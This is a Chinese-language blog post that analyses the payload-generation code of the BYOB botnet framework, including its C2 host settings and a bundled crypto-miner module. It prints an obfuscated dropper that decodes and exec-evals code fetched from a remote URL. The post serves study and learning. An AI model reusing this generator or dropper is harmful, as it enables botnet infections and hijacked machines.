提示 個人博客首頁 免責聲明:僅供學習交流使用!開源框架可能存在的風險和相關後果將完全由用戶自行承擔,本人不承擔任何法律責任。 1. byob web 介紹 1.1 平臺主要組件 1.1.1 fask 1.1.2 SQLAlchemy 1.1.3 threading 1.1.4 socket 1.1 ...
提示
- 個人博客首頁
- 免責聲明:僅供學習交流使用!開源框架可能存在的風險和相關後果將完全由用戶自行承擔,本人不承擔任何法律責任。
1. byob web 介紹
1.1 平臺主要組件
1.1.1 fask
1.1.2 SQLAlchemy
1.1.3 threading
1.1.4 socket
1.1.5 ***
1.2 攻擊過程
python 文件為例
1.2.1 生成過程 (route("/api/payload/generate")
1.2.1.1 client.main(**kwargs)
- models: 構建 client payload 的主要模塊
modules = ['modules/util.py','core/security.py','core/payloads.py', 'core/miner.py']
# util.py 許多模塊使用的雜項實用函數
# security.py 提供加密,膜拜,後續再慢慢分析 之前一直用的 pycryptomode
# payloads.py 提供 payloads 的socket 連接
# miner.py 礦工腳本
- imports: 構建 client payload 的主要模塊中的導入非本地庫
for x in ['core'] + [os.path.splitext(i)[0] for i in os.listdir('core')] + ['core.%s' % s for s in [os.path.splitext(i)[0] for i in os.listdir('core')]]:
if x in line:
break
else:
imports.add(line.strip())
# imports 返回獲取 modules 中的 import packets(排除 byob 本地文件包)
- hidden:獲取 moduls imports 中主要的 packets
for line in kwargs['imports']:
if len(line.split()) > 1:
for i in str().join(line.split()[1:]).split(';')[0].split(','):
i = line.split()[1] if i == '*' else i
hidden.add(i)
# hidden 排除 imports 中的 'import' 字元
- payloads: 主要的功能函數
loader = open('core/loader.py','r').read()#, generators.loader(host=C2_HOST, port=int(C2_PORT)+2, packages=list(kwargs['hidden']))))
# 載入 core/loader.py
test_imports = '\n'.join(['import ' + i for i in list(kwargs['hidden']) if i not in ['StringIO','_winreg','pycryptonight','pyrx','ctypes']])
# 導入 packets
potential_imports = '''
try:
import pycryptonight
import pyrx
except ImportError: pass
'''
# 可能導入的 packets
modules = '\n'.join(([open(module,'r').read().partition('# main')[2] for module in kwargs['modules']] + [generators.main('Payload', **{"host": C2_HOST, "port": C2_PORT, "pastebin": options.pastebin if options.pastebin else str(), "gui": "1" if options.gui else str(), "owner": options.owner}) + '_payload.run()']))
# 讀取 modules 數組內的文件名稱,並截取 # main 後的數據
# 加上 generators.main() 構造的 main template
# 最後拼接 _payload.run()
payload = '\n'.join((loader, test_imports, potential_imports, modules))
# 將上述數據拼接成 payload
- stagers: 獲取獨特的payload
if options.encrypt:
stager = open('core/stagers.py', 'r').read() + generators.main('run', url=kwargs['url'], key=kwargs['key'])
else:
stager = open('core/stagers.py', 'r').read() + generators.main('run', url=kwargs['url'])
# 獲取 core/stagers.py
# 並拼接 _run(url)
- dropper: 獲取 stagers
dropper = """import sys,zlib,base64,marshal,json,urllib
if sys.version_info[0] > 2:
from urllib import request
urlopen = urllib.request.urlopen if sys.version_info[0] > 2 else urllib.urlopen
exec(eval(marshal.loads(zlib.decompress(base64.b64decode({})))))""".format(repr(base64.b64encode(zlib.compress(marshal.dumps("urlopen({}).read()".format(repr(kwargs['url'])),2)))))
# 生成 dropper
參考資料
交個朋友
- github learnselfs
免責聲明:
本站提供的資源,都來自網路,版權爭議與本站無關,所有內容及軟體的文章僅限用於學習和研究目的。不得將上述內容用於商業或者非法用途,否則,一切後果請用戶自負,我們不保證內容的長久可用性,通過使用本站內容隨之而來的風險與本站無關,您必須在下載後的24個小時之內,從您的電腦/手機中徹底刪除上述內容。如果您喜歡該程式,請支持正版軟體,購買註冊,得到更好的正版服務。侵刪請致信